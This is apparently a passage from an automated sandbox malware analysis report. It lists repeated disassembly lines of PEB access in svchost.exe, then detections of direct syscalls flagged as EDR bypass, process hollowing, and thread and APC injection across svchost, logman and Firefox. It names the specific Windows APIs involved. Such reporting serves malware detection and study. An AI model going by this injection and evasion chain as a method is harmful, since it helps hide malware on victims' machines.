Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB97A9 mov eax, dword ptr fs:[00000030h]	1_2_03BB97A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	1_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	1_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	1_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	1_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBF7AF mov eax, dword ptr fs:[00000030h]	1_2_03BBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B307AF mov eax, dword ptr fs:[00000030h]	1_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEF78A mov eax, dword ptr fs:[00000030h]	1_2_03BEF78A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]	1_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]	1_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3D7E0 mov ecx, dword ptr fs:[00000030h]	1_2_03B3D7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]	1_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]	1_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]	1_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B357C0 mov eax, dword ptr fs:[00000030h]	1_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B357C0 mov eax, dword ptr fs:[00000030h]	1_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B357C0 mov eax, dword ptr fs:[00000030h]	1_2_03B357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C037B6 mov eax, dword ptr fs:[00000030h]	1_2_03C037B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB07C3 mov eax, dword ptr fs:[00000030h]	1_2_03BB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29730 mov eax, dword ptr fs:[00000030h]	1_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29730 mov eax, dword ptr fs:[00000030h]	1_2_03B29730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B65734 mov eax, dword ptr fs:[00000030h]	1_2_03B65734
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3973A mov eax, dword ptr fs:[00000030h]	1_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3973A mov eax, dword ptr fs:[00000030h]	1_2_03B3973A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C03749 mov eax, dword ptr fs:[00000030h]	1_2_03C03749
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]	1_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6273C mov ecx, dword ptr fs:[00000030h]	1_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]	1_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAC730 mov eax, dword ptr fs:[00000030h]	1_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEF72E mov eax, dword ptr fs:[00000030h]	1_2_03BEF72E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B33720 mov eax, dword ptr fs:[00000030h]	1_2_03B33720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4F720 mov eax, dword ptr fs:[00000030h]	1_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4F720 mov eax, dword ptr fs:[00000030h]	1_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4F720 mov eax, dword ptr fs:[00000030h]	1_2_03B4F720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF972B mov eax, dword ptr fs:[00000030h]	1_2_03BF972B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]	1_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]	1_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30710 mov eax, dword ptr fs:[00000030h]	1_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B60710 mov eax, dword ptr fs:[00000030h]	1_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6F71F mov eax, dword ptr fs:[00000030h]	1_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6F71F mov eax, dword ptr fs:[00000030h]	1_2_03B6F71F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B37703 mov eax, dword ptr fs:[00000030h]	1_2_03B37703
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B35702 mov eax, dword ptr fs:[00000030h]	1_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B35702 mov eax, dword ptr fs:[00000030h]	1_2_03B35702
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C700 mov eax, dword ptr fs:[00000030h]	1_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38770 mov eax, dword ptr fs:[00000030h]	1_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B765 mov eax, dword ptr fs:[00000030h]	1_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B765 mov eax, dword ptr fs:[00000030h]	1_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B765 mov eax, dword ptr fs:[00000030h]	1_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B765 mov eax, dword ptr fs:[00000030h]	1_2_03B2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30750 mov eax, dword ptr fs:[00000030h]	1_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]	1_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]	1_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB4755 mov eax, dword ptr fs:[00000030h]	1_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B43740 mov eax, dword ptr fs:[00000030h]	1_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B43740 mov eax, dword ptr fs:[00000030h]	1_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B43740 mov eax, dword ptr fs:[00000030h]	1_2_03B43740
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6674D mov esi, dword ptr fs:[00000030h]	1_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]	1_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]	1_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0B73C mov eax, dword ptr fs:[00000030h]	1_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0B73C mov eax, dword ptr fs:[00000030h]	1_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0B73C mov eax, dword ptr fs:[00000030h]	1_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0B73C mov eax, dword ptr fs:[00000030h]	1_2_03C0B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B276B2 mov eax, dword ptr fs:[00000030h]	1_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B276B2 mov eax, dword ptr fs:[00000030h]	1_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B276B2 mov eax, dword ptr fs:[00000030h]	1_2_03B276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B666B0 mov eax, dword ptr fs:[00000030h]	1_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]	1_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2D6AA mov eax, dword ptr fs:[00000030h]	1_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2D6AA mov eax, dword ptr fs:[00000030h]	1_2_03B2D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]	1_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]	1_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB368C mov eax, dword ptr fs:[00000030h]	1_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB368C mov eax, dword ptr fs:[00000030h]	1_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB368C mov eax, dword ptr fs:[00000030h]	1_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB368C mov eax, dword ptr fs:[00000030h]	1_2_03BB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BED6F0 mov eax, dword ptr fs:[00000030h]	1_2_03BED6F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC36EE mov eax, dword ptr fs:[00000030h]	1_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC36EE mov eax, dword ptr fs:[00000030h]	1_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC36EE mov eax, dword ptr fs:[00000030h]	1_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC36EE mov eax, dword ptr fs:[00000030h]	1_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC36EE mov eax, dword ptr fs:[00000030h]	1_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC36EE mov eax, dword ptr fs:[00000030h]	1_2_03BC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5D6E0 mov eax, dword ptr fs:[00000030h]	1_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5D6E0 mov eax, dword ptr fs:[00000030h]	1_2_03B5D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]	1_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF16CC mov eax, dword ptr fs:[00000030h]	1_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF16CC mov eax, dword ptr fs:[00000030h]	1_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF16CC mov eax, dword ptr fs:[00000030h]	1_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF16CC mov eax, dword ptr fs:[00000030h]	1_2_03BF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEF6C7 mov eax, dword ptr fs:[00000030h]	1_2_03BEF6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B616CF mov eax, dword ptr fs:[00000030h]	1_2_03B616CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E627 mov eax, dword ptr fs:[00000030h]	1_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F626 mov eax, dword ptr fs:[00000030h]	1_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F626 mov eax, dword ptr fs:[00000030h]	1_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F626 mov eax, dword ptr fs:[00000030h]	1_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F626 mov eax, dword ptr fs:[00000030h]	1_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F626 mov eax, dword ptr fs:[00000030h]	1_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F626 mov eax, dword ptr fs:[00000030h]	1_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F626 mov eax, dword ptr fs:[00000030h]	1_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F626 mov eax, dword ptr fs:[00000030h]	1_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F626 mov eax, dword ptr fs:[00000030h]	1_2_03B2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B66620 mov eax, dword ptr fs:[00000030h]	1_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68620 mov eax, dword ptr fs:[00000030h]	1_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3262C mov eax, dword ptr fs:[00000030h]	1_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B33616 mov eax, dword ptr fs:[00000030h]	1_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B33616 mov eax, dword ptr fs:[00000030h]	1_2_03B33616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72619 mov eax, dword ptr fs:[00000030h]	1_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B61607 mov eax, dword ptr fs:[00000030h]	1_2_03B61607
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE609 mov eax, dword ptr fs:[00000030h]	1_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6F603 mov eax, dword ptr fs:[00000030h]	1_2_03B6F603

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtClose: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\logman.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: NULL target: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: NULL target: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\logman.exe

Thread register set: target process: 7988

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\logman.exe

Thread APC queued: target process: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 300D008

Jump to behavior

Source: C:\Users\user\Desktop\YKzxWyqI6Y.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YKzxWyqI6Y.exe"	Jump to behavior
Source: C:\Program Files (x86)\vbaFexXopvmaeQBlSFrwNrYADHopwkqdvQkXMcOVWB\cuwattsjDnLrZm.exe	Process created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: YKzxWyqI6Y.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: cuwattsjDnLrZm.exe, 00000005.00000002.2943518696.0000000000F80000.00000002.00000001.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000005.00000000.2172586485.0000000000F80000.00000002.00000001.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2943763222.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: cuwattsjDnLrZm.exe, 00000005.00000002.2943518696.0000000000F80000.00000002.00000001.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000005.00000000.2172586485.0000000000F80000.00000002.00000001.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2943763222.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
